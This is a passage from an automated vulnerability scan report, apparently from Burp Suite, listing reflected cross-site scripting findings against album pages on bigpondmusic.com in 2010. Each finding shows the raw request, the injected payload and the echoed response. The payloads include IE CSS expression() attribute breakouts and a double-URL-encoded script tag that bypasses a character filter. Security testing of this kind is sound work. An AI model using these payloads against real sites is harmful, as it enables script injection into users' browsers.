Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f89c3'%3bd99db4e3abb was submitted in the REST URL parameter 1. This input was echoed as f89c3';d99db4e3abb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumf89c3'%3bd99db4e3abb/far-east-movement/like-a-g6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87845


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumf89c3';d99db4e3abb';
   s.prop4 = 'far-east-movement';
   s.prop5 = 'like-a-g6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.48. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 was submitted in the h parameter. This input was echoed as 976ec"style="x:expression(alert(1))"4b08bf62004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?h=744261064976ec"style%3d"x%3aexpression(alert(1))"4b08bf62004 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?h=744261064976ec"style="x:expression(alert(1))"4b08bf62004" />
...[SNIP]...

2.49. http://bigpondmusic.com/album/far-east-movement/like-a-g6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/far-east-movement/like-a-g6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 878a2"style="x:expression(alert(1))"ab522009b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/far-east-movement/like-a-g6?878a2"style%3d"x%3aexpression(alert(1))"ab522009b4e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97573


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?878a2"style="x:expression(alert(1))"ab522009b4e=1" />
...[SNIP]...

2.50. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3 was submitted in the REST URL parameter 1. This input was echoed as dc86a"><script>alert(1)</script>1869074cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the server answered with a 404 (the sitemap page) and still built the hidden parentUrl field from the request target, so the injection lands in the error page rather than the album page.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumdc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumdc86a"><script>alert(1)</script>1869074cf3/glee-cast/glee-the-music-the-christmas-album" />
...[SNIP]...

2.51. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41244'%3baf912ffdfba was submitted in the REST URL parameter 1. This input was echoed as 41244';af912ffdfba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album41244'%3baf912ffdfba/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album41244';af912ffdfba';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.52. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61097"style%3d"x%3aexpression(alert(1))"481039f11e9 was submitted in the h parameter. This input was echoed as 61097"style="x:expression(alert(1))"481039f11e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers. The breakout from the attribute (a raw double quote closing the value) is browser-independent; only the CSS expression() vector is Internet Explorer-specific, and IE8 in standards mode and later do not evaluate it.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style%3d"x%3aexpression(alert(1))"481039f11e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style="x:expression(alert(1))"481039f11e9" />
...[SNIP]...

2.53. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b176"style="x:expression(alert(1))"314c9adb4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?9b176"style="x:expression(alert(1))"314c9adb4aa=1" />
...[SNIP]...

2.54. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe was submitted in the REST URL parameter 1. This input was echoed as e4974"><script>alert(1)</script>0f5d7856cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albume4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume4974"><script>alert(1)</script>0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/" />
...[SNIP]...

2.55. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd58'%3bb759352d2a7 was submitted in the REST URL parameter 1. This input was echoed as 1bd58';b759352d2a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1bd58'%3bb759352d2a7/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1bd58';b759352d2a7';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.56. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 was submitted in the cid parameter. This input was echoed as a07ef"style="x:expression(alert(1))"21c6a478415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style="x:expression(alert(1))"21c6a478415" />
...[SNIP]...

2.57. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb638"style="x:expression(alert(1))"8fd9221ba73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?eb638"style="x:expression(alert(1))"8fd9221ba73=1" />
...[SNIP]...

2.58. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1bf9'%3b287a2412129 was submitted in the REST URL parameter 1. This input was echoed as c1bf9';287a2412129 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc1bf9'%3b287a2412129/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:54 GMT
